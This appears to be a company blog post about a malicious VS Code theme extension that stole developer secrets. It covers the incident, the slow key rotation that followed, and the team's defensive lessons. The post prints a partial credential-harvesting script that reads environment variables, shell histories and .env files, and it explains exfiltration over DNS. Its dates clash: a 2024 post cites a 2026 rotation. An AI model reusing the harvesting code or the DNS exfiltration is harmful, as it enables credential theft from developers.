← Blog

Security

Malicious VS Code extension: a seven-hour key-exfil scare

The first alert came at 16:42 on a Wednesday in May. Outbound DNS from a junior dev's laptop to a Cloudflare worker we had never registered.

Jacob Molkenboer· Founder · A Brand New Company· 31 Dec 2024· 9 min
Manila envelope with broken wax seal on leather blotter, green ribbon, small brass padlock ajar on cream index card.

The first alert came at 16:42 on a Wednesday in May. Outbound DNS queries from a Macbook in a Haarlem office to a four-word subdomain we had never registered, resolving to a Cloudflare Worker. The laptop belonged to a junior developer who had joined the team three weeks earlier.

She was in a 1:1 with her lead. We pulled her off the call, took the laptop off Wi-Fi, and started reading her Activity Monitor over her shoulder. Code Helper was sitting at 4% CPU, idle. The extensions panel showed twenty-two extensions installed. One of them, a small theme published a month earlier with around 1,200 downloads, was the one we had not seen before.

Two minutes in, we had the manifest open in a terminal. The extension shipped a single 11KB script that activated on onStartupFinished. It read process.env, walked ~/.zsh_history and ~/.bash_history, scanned every .env file under ~/Projects, and posted the lot to an attacker endpoint every fifteen minutes. The next post would have fired at 16:45.

We had three minutes.

What the extension actually did

The extension's manifest was unremarkable. A theme contribution, a couple of commands, an onStartupFinished activation event. The malicious code lived in a single file the marketplace did not flag on submission.

Stripped down, the relevant pattern looked like this:

const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

const HOME = os.homedir();
const HISTORY = ['.zsh_history', '.bash_history', '.psql_history'];
const ROOT = path.join(HOME, 'Projects');

function harvest() {
  const env = { ...process.env };
  const histories = HISTORY
    .map(f => path.join(HOME, f))
    .filter(fs.existsSync)
    .map(f => fs.readFileSync(f, 'utf8'));
  const envFiles = walk(ROOT, /\.env(\.\w+)?$/);
  return { env, histories, envFiles };
}

setInterval(() => post(harvest()), 15 * 60 * 1000);

The post function used dns.resolve4 on a domain the attacker controlled and exfiltrated payloads as base64 chunks encoded into successive A-record lookups. That is why our perimeter saw DNS, not HTTPS. A Cloudflare Worker on the other end reassembled the queries.

Two details to call out. The marketplace listing was real, with a publisher account registered the previous October and four legitimate-looking extensions before this one. And the activation event was onStartupFinished, not a command, so nothing the developer did each day was required. She had installed it once, three days earlier, while looking for a Solarized variant.

This pattern is not unique to one marketplace. Researchers have surfaced malicious npm packages, Chrome extensions, and VS Code themes that mirror popular work and ship a payload on first install. The attack surface for a small AI shop is the package and extension marketplaces, and the manifest review on those marketplaces is thin.

Mapping the blast radius

By 16:55 we had the list. Her .env files held nine secrets across four projects. In rough order of how badly we wanted them rotated:

The Anthropic key for a prototype agent had a $4,000 monthly budget on the org. The OpenAI key was a shared development key with no separate budget. Two Azure keys for a Postgres and a Storage account in a sandbox subscription. An AWS access-key pair for a personal IAM user with read access to one S3 bucket. A GitHub personal access token with repo scope. A Slack bot token for our internal posting bot. A Stripe restricted key for a test mode account.

And the part nobody wants to admit: the same Slack bot token was in three other developers' machines, hardcoded into one CI pipeline yaml, and committed to a private repo six months earlier.

If the attacker had two hours of unsupervised use, the realistic damage was a four-figure Anthropic bill, posts into our internal Slack from a bot the team trusted, and read access to one S3 bucket. The Stripe key was restricted to test mode and not interesting. The GitHub PAT was the bad one, because it could clone every private repo we have.

Seven hours of rotation

We pulled the keys in the order above, starting with the Anthropic and OpenAI ones because those have a meter that runs by the second. The first rotation, on Anthropic, took eleven minutes end to end. The Slack bot token took six hours.

The slow one was not the API call. The API call is one curl. The Anthropic admin API exposes a single endpoint to deactivate a key:

curl https://api.anthropic.com/v1/organizations/api_keys/$KEY_ID \
  -H "x-api-key: $ADMIN_KEY" \
  -H "anthropic-version: 2023-06-01" \
  -X POST \
  -d '{"status": "inactive"}'

OpenAI's rotation flow is the same shape: create the new key, paste it into the secret store, revoke the old. The slow part is what we had to fix to do the paste-in.

The Slack token lived in three CI pipelines. Two referenced it from a shared secret in our org settings, one had it inlined into the yaml. The inlined one was the one we missed first. After we rotated, that pipeline failed for forty minutes before the developer on call noticed. The bot started 404-ing in Slack at the same time. Anyone watching the channel could tell something was off.

The GitHub PAT was the second-slow one. Once revoked, three local clones started failing on git pull and one Vercel build that used the PAT for a private npm dependency stopped resolving. The Vercel build was the only one anyone had actually documented.

By 23:38 every key was rotated, every pipeline green, the laptop reimaged, and a written incident note was in the team's shared Notion. Seven hours, twelve people involved at one point or another, one cancelled dinner.

Warning

If you cannot list every place a given secret is read from in under two minutes, you do not have an incident response plan. You have a treasure hunt.

The quarterly drill nobody runs

The drill is not complicated. We had written it down in 2024 and not run it once.

A quarterly key-rotation drill, scoped to ninety minutes, looks like this. One person picks a secret at random from the secrets inventory. The on-call rotates it. The rest of the team finds out by what breaks, fixes their side, and posts the fix in a thread. At the end of ninety minutes everything is back to green, or you have a written list of things to fix.

The drill teaches you four things. Where the secret is actually read from, not where you think it is. Who needs to be in the room. How long each rotation actually takes when you are not panicking. And which CI pipelines have hardcoded values you forgot about.

For the inventory itself, we now keep a single yaml file in our internal ops repo with one entry per secret:

- id: anthropic_prod_agent_1
  vendor: anthropic
  rotation_method: admin_api
  read_by:
    - service: pier-agent
      location: vercel:env:ANTHROPIC_KEY
    - service: pier-agent-staging
      location: vercel:env:ANTHROPIC_KEY
  last_rotated: 2026-05-14
  rotation_minutes_observed: 11

The rotation_minutes_observed field is the one most teams skip. It is the only field that tells you what your real recovery time is, as opposed to the recovery time on a diagram.

The local-machine defence is a two-minute writeup. Add a gitleaks pre-commit hook to every repo. Audit installed VS Code extensions monthly and remove the ones nobody can name. Keep secrets out of .env files where you can, and where you cannot, scope them down. Use restricted keys on every vendor that supports them: OpenAI, Anthropic, Stripe, Slack all do, and the restricted variants would have shrunk our blast radius by at least three of the nine keys.

What we would do on day one of a new engagement

Walking out of the office at midnight, the lead and I made a list of what would have made the day a one-hour story instead of a seven-hour one. The list had four items: the gitleaks hook, the monthly extension audit, the secrets inventory yaml, and a recurring calendar invite for the drill. None of them costs money. All of them require someone to write the first version.

When we built the AI agents for a 40-person agency in Amsterdam last year, the same shape of problem turned up around their Mailchimp and Klaviyo keys. We solved it by running a dry-run rotation on day one of the engagement and writing the inventory file before we shipped a single agent. It took half a day. It would have saved them four if they had needed it.

The smallest thing you can do today is open your secrets manager, pick the noisiest key, and try to revoke it. If revoking takes more than one person, more than one tab, or more than thirty minutes, you have just scoped your next ninety-minute drill.

Key takeaway

If you can't list every place a secret is read from in under two minutes, you don't have an incident response plan. You have a treasure hunt.

FAQ

How does an attacker exfiltrate data over DNS?

They split the payload into base64 chunks, encode each as a subdomain of a domain they control, and let the attacker's nameserver log the lookups and reassemble them. Most perimeter firewalls allow outbound DNS by default.

Should we block the VS Code marketplace?

Usually not. An allowlist of approved extensions and a monthly audit is enough for most teams. The goal is to make sure a malicious install cannot reach a secret, not to stop developers from installing tools.

How long should a credential rotation actually take?

For one secret with the rotation documented, eleven minutes is realistic. For nine secrets across four projects with hardcoded references in CI, plan for half a day. Measure your own number once and write it down in the inventory.

What's the cheapest rotation drill?

One person picks a secret at random each quarter, the on-call rotates it, the rest of the team fixes what breaks in the next ninety minutes. No new tooling required, and the breakages tell you where your inventory is wrong.

Are restricted API keys worth the setup?

Yes. Anthropic, OpenAI, Stripe, Slack and most vendors let you scope a key to a workspace, a model, or a permission set. Three of our nine compromised keys would have been near-worthless to the attacker if scoped properly.

securityoperationstoolingai agentsautomation

Building something?

Start a project